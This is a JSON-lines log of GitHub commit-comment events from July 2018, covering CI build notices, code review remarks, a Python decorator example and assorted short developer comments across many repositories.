{"id":"7968539581","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715396,"position":null,"line":null,"path":null,"commit_id":"22cbbf0743ee85ac875b3bb2d84600d3e2535cd0","created_at":"2018-07-16T03:52:42Z","updated_at":"2018-07-16T03:52:42Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 515](https://ci.hashicorp.engineering/viewLog.html?buildId=104060&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:25"}},"created_at":"2018-07-16T03:52:42Z"}
{"id":"7968544563","type":"CommitCommentEvent","actor":{"login":"RyanFlemming"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29715401,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-16T03:55:25Z","updated_at":"2018-07-16T03:55:25Z","author_association":"NONE","body":"@MarkoTotti so I've done some digging and found [this](https://www.tsql.info/error/msg-2705-level-16-column-names-in-each-table-must-be-unique.php)\n\nCould you post your column information from sql server object explorer? "}},"created_at":"2018-07-16T03:55:25Z"}
{"id":"7968545062","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29715402,"position":null,"line":null,"path":null,"commit_id":"08cc23e1f17d9661c8bb72b58a516e742003860a","created_at":"2018-07-16T03:55:41Z","updated_at":"2018-07-16T03:55:41Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-16T03:55:41Z"}
{"id":"7968547745","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715404,"position":null,"line":null,"path":null,"commit_id":"98298ede020a2517234220e16b8f07f21e4616e3","created_at":"2018-07-16T03:57:06Z","updated_at":"2018-07-16T03:57:06Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 516](https://ci.hashicorp.engineering/viewLog.html?buildId=104061&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T03:57:06Z"}
{"id":"7968548473","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715406,"position":null,"line":null,"path":null,"commit_id":"98298ede020a2517234220e16b8f07f21e4616e3","created_at":"2018-07-16T03:57:31Z","updated_at":"2018-07-16T03:57:31Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 516](https://ci.hashicorp.engineering/viewLog.html?buildId=104061&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:25"}},"created_at":"2018-07-16T03:57:31Z"}
{"id":"7968550625","type":"CommitCommentEvent","actor":{"login":"dginev"},"repo":{"name":"KWARC/rust-libxml"},"payload":{"comment":{"id":29715408,"position":31,"line":175,"path":"src/c_signatures.rs","commit_id":"99855f6a824104951a5c3a66f0e80faddb33bc79","created_at":"2018-07-16T03:58:50Z","updated_at":"2018-07-16T03:58:50Z","author_association":"MEMBER","body":"scary typo behavior here - there was no error, just a silent memory leak, when this wrongly named C function was being called"}},"created_at":"2018-07-16T03:58:50Z"}
{"id":"7968551531","type":"CommitCommentEvent","actor":{"login":"dginev"},"repo":{"name":"KWARC/rust-libxml"},"payload":{"comment":{"id":29715409,"position":59,"line":177,"path":"src/tree.rs","commit_id":"99855f6a824104951a5c3a66f0e80faddb33bc79","created_at":"2018-07-16T03:59:20Z","updated_at":"2018-07-16T03:59:20Z","author_association":"MEMBER","body":"moved these bookmarks even tighter - into the `wrap` method, so that they are never forgotten"}},"created_at":"2018-07-16T03:59:20Z"}
{"id":"7968551867","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715412,"position":null,"line":null,"path":null,"commit_id":"e50a0c71f101c9b044bb158d14e62b04c785bb22","created_at":"2018-07-16T03:59:30Z","updated_at":"2018-07-16T03:59:30Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 517](https://ci.hashicorp.engineering/viewLog.html?buildId=104062&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T03:59:30Z"}
{"id":"7968552601","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715413,"position":null,"line":null,"path":null,"commit_id":"e50a0c71f101c9b044bb158d14e62b04c785bb22","created_at":"2018-07-16T03:59:56Z","updated_at":"2018-07-16T03:59:56Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 517](https://ci.hashicorp.engineering/viewLog.html?buildId=104062&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:23"}},"created_at":"2018-07-16T03:59:56Z"}
{"id":"7968552654","type":"CommitCommentEvent","actor":{"login":"dginev"},"repo":{"name":"KWARC/rust-libxml"},"payload":{"comment":{"id":29715414,"position":72,"line":392,"path":"src/tree.rs","commit_id":"99855f6a824104951a5c3a66f0e80faddb33bc79","created_at":"2018-07-16T03:59:57Z","updated_at":"2018-07-16T03:59:57Z","author_association":"MEMBER","body":"best to always bookmark the nodes when wrapping them, correct?"}},"created_at":"2018-07-16T03:59:57Z"}
{"id":"7968554218","type":"CommitCommentEvent","actor":{"login":"dginev"},"repo":{"name":"KWARC/rust-libxml"},"payload":{"comment":{"id":29715422,"position":28,"line":107,"path":"src/xpath.rs","commit_id":"99855f6a824104951a5c3a66f0e80faddb33bc79","created_at":"2018-07-16T04:00:37Z","updated_at":"2018-07-16T04:00:37Z","author_association":"MEMBER","body":"another wrong name"}},"created_at":"2018-07-16T04:00:37Z"}
{"id":"7968555215","type":"CommitCommentEvent","actor":{"login":"Contributorseven"},"repo":{"name":"ArkeologeN/node-linkedin"},"payload":{"comment":{"id":29715427,"position":null,"line":null,"path":null,"commit_id":"bcca8f971a5d382e84e39c5abafe735e3c23eefe","created_at":"2018-07-16T04:01:09Z","updated_at":"2018-07-16T04:01:09Z","author_association":"NONE","body":"there will be no excuse for you all "}},"created_at":"2018-07-16T04:01:09Z"}
{"id":"7968558463","type":"CommitCommentEvent","actor":{"login":"arturi"},"repo":{"name":"kvz/lanyon"},"payload":{"comment":{"id":29715432,"position":null,"line":null,"path":null,"commit_id":"0dae45c7cfd7636e6058845f36e22c1ac83ce0df","created_at":"2018-07-16T04:02:59Z","updated_at":"2018-07-16T04:02:59Z","author_association":"COLLABORATOR","body":"🚀"}},"created_at":"2018-07-16T04:02:59Z"}
{"id":"7968560348","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29715434,"position":1,"line":null,"path":"1531713838.58/github_test.txt","commit_id":"03fce22519d369c092e1dba4a4857009751585c8","created_at":"2018-07-16T04:04:00Z","updated_at":"2018-07-16T04:04:00Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-16T04:04:00Z"}
{"id":"7968564305","type":"CommitCommentEvent","actor":{"login":"manojhl"},"repo":{"name":"naveenkumarkg/100-days-of-code"},"payload":{"comment":{"id":29715440,"position":21,"line":18,"path":"r1-log.md","commit_id":"a873c936599eb344375d429122bd44ad3acac5de","created_at":"2018-07-16T04:06:15Z","updated_at":"2018-07-16T04:06:15Z","author_association":"NONE","body":"Good. Nice going."}},"created_at":"2018-07-16T04:06:15Z"}
{"id":"7968564867","type":"CommitCommentEvent","actor":{"login":"natanbc"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29715441,"position":null,"line":null,"path":null,"commit_id":"a83590ee67294ae053eaad0a7b0702cbdeaa4aff","created_at":"2018-07-16T04:06:37Z","updated_at":"2018-07-16T04:06:37Z","author_association":"MEMBER","body":"Error: Lombok detected.\r\nPlease fix this before attempting to compile again."}},"created_at":"2018-07-16T04:06:37Z"}
{"id":"7968566351","type":"CommitCommentEvent","actor":{"login":"Sterophonick"},"repo":{"name":"ez-flash/omega-kernel"},"payload":{"comment":{"id":29715442,"position":null,"line":null,"path":null,"commit_id":"ab2d11058b74ee4f101ffd6b84df9c80ae69df5f","created_at":"2018-07-16T04:07:27Z","updated_at":"2018-07-16T04:07:27Z","author_association":"NONE","body":"HOLY CRAP. THANK YOU."}},"created_at":"2018-07-16T04:07:27Z"}
{"id":"7968568671","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29715446,"position":null,"line":null,"path":null,"commit_id":"d55ae9d83c5efb6c7f2d9e278c30c3f8c2d78ae4","created_at":"2018-07-16T04:08:50Z","updated_at":"2018-07-16T04:08:50Z","author_association":"NONE","body":"Interesting.  What about following the PV instead of the TT? "}},"created_at":"2018-07-16T04:08:50Z"}
{"id":"7968569069","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715450,"position":null,"line":null,"path":null,"commit_id":"cfaccb8564e9f322273789c901a2f2ef5d1fae00","created_at":"2018-07-16T04:09:07Z","updated_at":"2018-07-16T04:09:07Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 518](https://ci.hashicorp.engineering/viewLog.html?buildId=104063&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T04:09:07Z"}
{"id":"7968569801","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715455,"position":null,"line":null,"path":null,"commit_id":"cfaccb8564e9f322273789c901a2f2ef5d1fae00","created_at":"2018-07-16T04:09:33Z","updated_at":"2018-07-16T04:09:33Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 518](https://ci.hashicorp.engineering/viewLog.html?buildId=104063&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:24"}},"created_at":"2018-07-16T04:09:33Z"}
{"id":"7968570744","type":"CommitCommentEvent","actor":{"login":"nikhita"},"repo":{"name":"jwflory/conf"},"payload":{"comment":{"id":29715456,"position":5,"line":16,"path":"git/gitconfig","commit_id":"f0a29f34f973dea2e57aa33595bbdba45de500e7","created_at":"2018-07-16T04:10:08Z","updated_at":"2018-07-16T04:10:08Z","author_association":"NONE","body":"nice! :heart: \r\n\r\nlet me know later if it improved/made any big differences to your workflow. :)"}},"created_at":"2018-07-16T04:10:08Z"}
{"id":"7968571308","type":"CommitCommentEvent","actor":{"login":"anjanaNewput"},"repo":{"name":"Rupak-2209/r_project"},"payload":{"comment":{"id":29715458,"position":80,"line":80,"path":"mustache/bookSite.html","commit_id":"d2f753ec8656be8ba4cbb3f7b45d01d8a7d4a81a","created_at":"2018-07-16T04:10:26Z","updated_at":"2018-07-16T04:10:26Z","author_association":"COLLABORATOR","body":"Remove extra line."}},"created_at":"2018-07-16T04:10:26Z"}
{"id":"7968572121","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/sortedcontainers-feedstock"},"payload":{"comment":{"id":29715459,"position":null,"line":null,"path":null,"commit_id":"2506a454899ddd604eeb80fe98afc4d74deaefcb","created_at":"2018-07-16T04:10:55Z","updated_at":"2018-07-16T04:10:55Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @grantjenks were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @grantjenks were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-16T04:10:55Z"}
{"id":"7968577819","type":"CommitCommentEvent","actor":{"login":"SimePel"},"repo":{"name":"usefathom/fathom"},"payload":{"comment":{"id":29715464,"position":5,"line":57,"path":"cmd/fathom/main.go","commit_id":"64b131f7f5db022fb043e291f0534a15c4dd4829","created_at":"2018-07-16T04:14:23Z","updated_at":"2018-07-16T04:14:23Z","author_association":"NONE","body":"Of course, it's my mistake."}},"created_at":"2018-07-16T04:14:23Z"}
{"id":"7968579871","type":"CommitCommentEvent","actor":{"login":"abitrolly"},"repo":{"name":"genuinetools/reg"},"payload":{"comment":{"id":29715471,"position":null,"line":null,"path":null,"commit_id":"1b4fbf176fccde8f8fd55ff386182a75142c7058","created_at":"2018-07-16T04:15:29Z","updated_at":"2018-07-16T04:15:29Z","author_association":"NONE","body":"Are there any libs that allow to expose cli API as REST API also? I'd like to use query for server version."}},"created_at":"2018-07-16T04:15:29Z"}
{"id":"7968579980","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"sigevo-summer-school-2018/tiger-mosquito-algorithm"},"payload":{"comment":{"id":29715472,"position":null,"line":null,"path":null,"commit_id":"15191a03723e1f1c714bcf9c8425e52d89680627","created_at":"2018-07-16T04:15:33Z","updated_at":"2018-07-16T04:15:33Z","author_association":"CONTRIBUTOR","body":"Please don't use the three backticks. That's for code. "}},"created_at":"2018-07-16T04:15:33Z"}
{"id":"7968580332","type":"CommitCommentEvent","actor":{"login":"keyenram92"},"repo":{"name":"keyenram92/Kaggle"},"payload":{"comment":{"id":29715473,"position":null,"line":null,"path":null,"commit_id":"63e61112e498aa21b412b493814e96d2d6c2ddc1","created_at":"2018-07-16T04:15:46Z","updated_at":"2018-07-16T04:15:46Z","author_association":"OWNER","body":"Processing of bureau.csv and bureau_balance.csv"}},"created_at":"2018-07-16T04:15:46Z"}
{"id":"7968580402","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"sigevo-summer-school-2018/tiger-mosquito-algorithm"},"payload":{"comment":{"id":29715474,"position":4,"line":10,"path":"README.md","commit_id":"15191a03723e1f1c714bcf9c8425e52d89680627","created_at":"2018-07-16T04:15:49Z","updated_at":"2018-07-16T04:15:49Z","author_association":"CONTRIBUTOR","body":"Just eliminate this line"}},"created_at":"2018-07-16T04:15:49Z"}
{"id":"7968580586","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"sigevo-summer-school-2018/tiger-mosquito-algorithm"},"payload":{"comment":{"id":29715476,"position":11,"line":16,"path":"README.md","commit_id":"15191a03723e1f1c714bcf9c8425e52d89680627","created_at":"2018-07-16T04:15:55Z","updated_at":"2018-07-16T04:15:55Z","author_association":"CONTRIBUTOR","body":"And this line."}},"created_at":"2018-07-16T04:15:55Z"}
{"id":"7968581242","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"sigevo-summer-school-2018/tiger-mosquito-algorithm"},"payload":{"comment":{"id":29715479,"position":null,"line":null,"path":null,"commit_id":"15191a03723e1f1c714bcf9c8425e52d89680627","created_at":"2018-07-16T04:16:16Z","updated_at":"2018-07-16T04:16:16Z","author_association":"CONTRIBUTOR","body":"Please refer to the issue that you are working on. With the next commit please reassign for revision."}},"created_at":"2018-07-16T04:16:16Z"}
{"id":"7968582638","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29715482,"position":null,"line":null,"path":null,"commit_id":"d55ae9d83c5efb6c7f2d9e278c30c3f8c2d78ae4","created_at":"2018-07-16T04:17:06Z","updated_at":"2018-07-16T04:17:06Z","author_association":"OWNER","body":"Could also be done, it looks more complicated, since eventually you will have to switch to TT"}},"created_at":"2018-07-16T04:17:06Z"}
{"id":"7968583811","type":"CommitCommentEvent","actor":{"login":"abitrolly"},"repo":{"name":"genuinetools/reg"},"payload":{"comment":{"id":29715486,"position":null,"line":null,"path":null,"commit_id":"f99f1ce934c471ea4691815a4f7a3a388c684523","created_at":"2018-07-16T04:17:46Z","updated_at":"2018-07-16T04:17:46Z","author_association":"NONE","body":"```\r\n-p --password   password for the registry (default: <none>)\r\n```\r\nThat's probably the most concise format. Double dash for long commands is good as well."}},"created_at":"2018-07-16T04:17:46Z"}
{"id":"7968584999","type":"CommitCommentEvent","actor":{"login":"PhillipPruett"},"repo":{"name":"mezz/JustEnoughItems"},"payload":{"comment":{"id":29715491,"position":null,"line":null,"path":null,"commit_id":"c6e4329b8cf85df9c9a9719dc783a829f45e9e54","created_at":"2018-07-16T04:18:27Z","updated_at":"2018-07-16T04:18:27Z","author_association":"NONE","body":"Perfect, thanks."}},"created_at":"2018-07-16T04:18:27Z"}
{"id":"7968585601","type":"CommitCommentEvent","actor":{"login":"taki"},"repo":{"name":"taki/copy_link"},"payload":{"comment":{"id":29715492,"position":11,"line":11,"path":"manifest.json","commit_id":"65ad8b13319dcfe30d84128afc386f6c3535f9ab","created_at":"2018-07-16T04:18:48Z","updated_at":"2018-07-16T04:18:48Z","author_association":"OWNER","body":"> この API を使って開いているタブの一覧を取得したり、いろいろな条件でフィルターしたり、タブを開き、更新し、移動し、再読み込みし、削除できます。\r\n\r\ncf. [tabs - Mozilla | MDN](https://developer.mozilla.org/ja/Add-ons/WebExtensions/API/tabs)"}},"created_at":"2018-07-16T04:18:48Z"}
{"id":"7968586258","type":"CommitCommentEvent","actor":{"login":"robthr"},"repo":{"name":"robthr/tbapi"},"payload":{"comment":{"id":29715493,"position":null,"line":null,"path":null,"commit_id":"98ddf1a9ac11f0bfc2fc96b8a67022521826a8ae","created_at":"2018-07-16T04:19:11Z","updated_at":"2018-07-16T04:19:11Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Download sound files to client](https://trello.com/c/HeTAaooB/26-download-sound-files-to-client)"}},"created_at":"2018-07-16T04:19:11Z"}
{"id":"7968587377","type":"CommitCommentEvent","actor":{"login":"anjanaNewput"},"repo":{"name":"Rupak-2209/r_project"},"payload":{"comment":{"id":29715495,"position":53,"line":53,"path":"mustache/bookSite.js","commit_id":"d2f753ec8656be8ba4cbb3f7b45d01d8a7d4a81a","created_at":"2018-07-16T04:19:52Z","updated_at":"2018-07-16T04:19:52Z","author_association":"COLLABORATOR","body":"we have clear the text of content div in line 49 and same here why? it this additional?"}},"created_at":"2018-07-16T04:19:52Z"}
{"id":"7968587556","type":"CommitCommentEvent","actor":{"login":"Deanfost"},"repo":{"name":"Deanfost/ar-gallery"},"payload":{"comment":{"id":29715496,"position":null,"line":null,"path":null,"commit_id":"199f6eb89ddf610d839ca2708927b094babaea01","created_at":"2018-07-16T04:19:57Z","updated_at":"2018-07-16T04:19:57Z","author_association":"OWNER","body":"Also removed anything related to video, as playing video in AR Core is currently not supported. Moving to images instead."}},"created_at":"2018-07-16T04:19:57Z"}
{"id":"7968587613","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29715497,"position":null,"line":null,"path":null,"commit_id":"b85c0cdf353399d01aa97ce07ed7b7d80d2cca66","created_at":"2018-07-16T04:20:00Z","updated_at":"2018-07-16T04:20:00Z","author_association":"OWNER","body":"**### #变参数装饰器：**\r\n```\r\n#Downtiser\r\n\r\nimport time\r\n\r\ndef timer(func):  #通过后续@timer时将未经装饰的text1的地址传入赋给func\r\n    def deco(*args,**kwargs): #用于装饰含任意个数参数的函数\r\n        start_time=time.time()\r\n        func(*args,**kwargs)\r\n        end_time=time.time()\r\n        print('run time>>>',end_time-start_time)\r\n    return deco  #@timer语句结束后,text1被重新赋值为deco的地址\r\n\r\n@timer                     #这四句代码等价于：def text1():\r\ndef text1():               #                   time.sleep(2)\r\n    time.sleep(2)          #                   print('this is text1')\r\n    print('this is text1') #              text1=timer(text1)\r\n\r\n@timer\r\ndef text2(name,x):\r\n    time.sleep(1)\r\n    time_foramte='%Y-%m-%d %X'\r\n    print(name,x,time.strftime(time_foramte))\r\n\r\ntext1()\r\ntext2('downtiser',233)\r\n```\r\n"}},"created_at":"2018-07-16T04:20:00Z"}
{"id":"7968589068","type":"CommitCommentEvent","actor":{"login":"Sagnik193"},"repo":{"name":"Sagnik193/Supply_demand_analysis"},"payload":{"comment":{"id":29715500,"position":2,"line":2,"path":"README.md","commit_id":"b8b0be76ed5aa718619547f416f8f44fc6c890ed","created_at":"2018-07-16T04:20:44Z","updated_at":"2018-07-16T04:20:44Z","author_association":"OWNER","body":"The cab company, Uber was facing a serious gap in their Supply-Demand. In this case study, I have tried to find the reason behind this gap by doing Exploratory Data Analysis on the provided data set. \r\nThis helps in providing useful insights which is not possible to get just by looking at the data. "}},"created_at":"2018-07-16T04:20:44Z"}
{"id":"7968589249","type":"CommitCommentEvent","actor":{"login":"geekdevs"},"repo":{"name":"TheBigBrainsCompany/TbbcMoneyBundle"},"payload":{"comment":{"id":29715502,"position":null,"line":null,"path":null,"commit_id":"417a94d111d97feb5453e02c5c92b575e9c41381","created_at":"2018-07-16T04:20:51Z","updated_at":"2018-07-16T04:20:51Z","author_association":"COLLABORATOR","body":"To be clear - version 3.1.5 was a mistake, I merged symfony 4 support without noticing that moneyphp/money was also updated. So I just reverted it on 3.1.6.\r\nMaster still uses v3+"}},"created_at":"2018-07-16T04:20:51Z"}
{"id":"7968591051","type":"CommitCommentEvent","actor":{"login":"abitrolly"},"repo":{"name":"genuinetools/reg"},"payload":{"comment":{"id":29715507,"position":null,"line":null,"path":null,"commit_id":"b8168d0c4bb0c47b0e1d46d3aa174b5e37ee9f8e","created_at":"2018-07-16T04:21:50Z","updated_at":"2018-07-16T04:21:50Z","author_association":"NONE","body":"Looks like personalized [cookiecutter](https://github.com/audreyr/cookiecutter). Can not clone it."}},"created_at":"2018-07-16T04:21:50Z"}
{"id":"7968591555","type":"CommitCommentEvent","actor":{"login":"Sagnik193"},"repo":{"name":"Sagnik193/Supply_demand_analysis"},"payload":{"comment":{"id":29715508,"position":2,"line":2,"path":"README.md","commit_id":"b8b0be76ed5aa718619547f416f8f44fc6c890ed","created_at":"2018-07-16T04:22:08Z","updated_at":"2018-07-16T04:22:08Z","author_association":"OWNER","body":"The cab company, Uber was facing a serious gap in their Supply-Demand. In this case study, I have tried to find the reason behind this gap by doing Exploratory Data Analysis on the provided data set.\r\nThis helps in providing useful insights which is not possible to get just by looking at the data."}},"created_at":"2018-07-16T04:22:08Z"}
{"id":"7968592474","type":"CommitCommentEvent","actor":{"login":"anotherCPL"},"repo":{"name":"anotherCPL/images"},"payload":{"comment":{"id":29715510,"position":2,"line":2,"path":"README.md","commit_id":"10b76ffaedcc2ff9d05d52b7f8c9f9cc52cb0189","created_at":"2018-07-16T04:22:37Z","updated_at":"2018-07-16T04:22:37Z","author_association":"OWNER","body":"![图片说明1]()"}},"created_at":"2018-07-16T04:22:37Z"}
{"id":"7968592715","type":"CommitCommentEvent","actor":{"login":"anjanaNewput"},"repo":{"name":"Rupak-2209/r_project"},"payload":{"comment":{"id":29715511,"position":8,"line":8,"path":"mustache/bookSite.scss","commit_id":"d2f753ec8656be8ba4cbb3f7b45d01d8a7d4a81a","created_at":"2018-07-16T04:22:46Z","updated_at":"2018-07-16T04:22:46Z","author_association":"COLLABORATOR","body":"can we merge these two heading css?"}},"created_at":"2018-07-16T04:22:46Z"}
{"id":"7968610682","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715545,"position":null,"line":null,"path":null,"commit_id":"faa2cdc6b792d5ddd67c03da40d706a1c513bb71","created_at":"2018-07-16T04:32:45Z","updated_at":"2018-07-16T04:32:45Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 519](https://ci.hashicorp.engineering/viewLog.html?buildId=104064&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T04:32:45Z"}
{"id":"7968611541","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715547,"position":null,"line":null,"path":null,"commit_id":"faa2cdc6b792d5ddd67c03da40d706a1c513bb71","created_at":"2018-07-16T04:33:17Z","updated_at":"2018-07-16T04:33:17Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 519](https://ci.hashicorp.engineering/viewLog.html?buildId=104064&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:32"}},"created_at":"2018-07-16T04:33:17Z"}
{"id":"7968611577","type":"CommitCommentEvent","actor":{"login":"700000000"},"repo":{"name":"arabelle/capstone-team24"},"payload":{"comment":{"id":29715549,"position":33,"line":37,"path":"client/src/js/services/user.service.js","commit_id":"2d8be7a2103a94ddb4b05a5224b0c647eea946e9","created_at":"2018-07-16T04:33:19Z","updated_at":"2018-07-16T04:33:19Z","author_association":"NONE","body":"70000"}},"created_at":"2018-07-16T04:33:19Z"}
{"id":"7968613463","type":"CommitCommentEvent","actor":{"login":"700000000"},"repo":{"name":"arabelle/capstone-team24"},"payload":{"comment":{"id":29715550,"position":null,"line":null,"path":null,"commit_id":"2d8be7a2103a94ddb4b05a5224b0c647eea946e9","created_at":"2018-07-16T04:34:23Z","updated_at":"2018-07-16T04:34:23Z","author_association":"NONE","body":"http://mycompany.blogspot.com"}},"created_at":"2018-07-16T04:34:23Z"}
{"id":"7968622662","type":"CommitCommentEvent","actor":{"login":"FauziAmth"},"repo":{"name":"google/ExoPlayer"},"payload":{"comment":{"id":29715556,"position":null,"line":null,"path":null,"commit_id":"18d208ab937e274da4974fad7b8601d35179e486","created_at":"2018-07-16T04:39:28Z","updated_at":"2018-07-16T04:39:28Z","author_association":"NONE","body":"this solution work if DownloadService not bound to activity/fragment because when downloading or removing done onDestroyed() not getting called yet.. i think it is better to clear on progressing notification (downloading/removing) when its done not only in onDestroy()..\r\n\r\nps : i need to bound to service that extend DownloadService because i have to put some Object inside it and when downloading/removing done (onTaskStateChanged()) i can do something to that Object based on taskState.action.uri that has something todo with my database"}},"created_at":"2018-07-16T04:39:28Z"}
{"id":"7968623035","type":"CommitCommentEvent","actor":{"login":"jarrettch"},"repo":{"name":"BurntSushi/nflgame"},"payload":{"comment":{"id":29715557,"position":null,"line":null,"path":null,"commit_id":"c9747ccb597d6c31f61e4002bc4bd9f45a05b064","created_at":"2018-07-16T04:39:43Z","updated_at":"2018-07-16T04:39:43Z","author_association":"NONE","body":"Can this be handed off?"}},"created_at":"2018-07-16T04:39:43Z"}
{"id":"7968623549","type":"CommitCommentEvent","actor":{"login":"JonJagger"},"repo":{"name":"cyber-dojo-languages/java-junit"},"payload":{"comment":{"id":29715558,"position":null,"line":null,"path":null,"commit_id":"8ee4de5e14a31e2ede9c40373977802417aeb818","created_at":"2018-07-16T04:40:00Z","updated_at":"2018-07-16T04:40:00Z","author_association":"CONTRIBUTOR","body":"Hi Eric,\r\nthe new java_junit image is already live on cyber-dojo.org\r\nSo for now if you new copy-paste the test-source into the browser it will work.\r\nI'll make the test-source live soon too, probably this coming Sunday.\r\nBit busy at the moment on a new project, plus moving house!\r\nThanks\r\nJon"}},"created_at":"2018-07-16T04:40:00Z"}
{"id":"7968625491","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715560,"position":null,"line":null,"path":null,"commit_id":"0980c88590cb1388ccf16f4aa8d6c30df9158452","created_at":"2018-07-16T04:41:00Z","updated_at":"2018-07-16T04:41:00Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 520](https://ci.hashicorp.engineering/viewLog.html?buildId=104065&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T04:41:00Z"}
{"id":"7968626270","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29715564,"position":null,"line":null,"path":null,"commit_id":"0980c88590cb1388ccf16f4aa8d6c30df9158452","created_at":"2018-07-16T04:41:25Z","updated_at":"2018-07-16T04:41:25Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 520](https://ci.hashicorp.engineering/viewLog.html?buildId=104065&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:25"}},"created_at":"2018-07-16T04:41:25Z"}
{"id":"7968628017","type":"CommitCommentEvent","actor":{"login":"abbasali"},"repo":{"name":"nupur-batra/sample_project"},"payload":{"comment":{"id":29715567,"position":5,"line":12,"path":"config/Migrations/20180712133319_Initial.php","commit_id":"44a9e6bfed9668518d0c0d84f8ac0350a6c9af32","created_at":"2018-07-16T04:42:26Z","updated_at":"2018-07-16T04:42:26Z","author_association":"NONE","body":"@nupur-batra Why was the table named `form_details` and not `guestbook` or something similar?"}},"created_at":"2018-07-16T04:42:26Z"}
